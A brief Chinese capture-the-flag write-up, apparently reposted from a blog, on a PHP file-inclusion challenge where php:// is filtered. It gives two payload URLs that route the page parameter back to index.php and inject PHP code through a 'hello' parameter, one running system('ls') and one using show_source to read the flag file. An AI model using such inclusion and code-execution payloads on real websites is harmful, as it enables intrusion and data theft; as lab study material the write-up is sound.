本文共 276 字,大约阅读时间需要 1 分钟。
题目代码
用php://来引入文件流,然后include显示文件信息
php://被过滤,但是有个hello
因为这个页面就是默认页面,而且默认页面也可以用index.php来访问可以把page转到当前页面,并且配合hello来执行一条php函数的语句获取信息就可以了。
?page=http://127.0.0.1/index.php/?hello=<?system("ls");?>
?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?> 转载地址:http://wknh.baihongyu.com/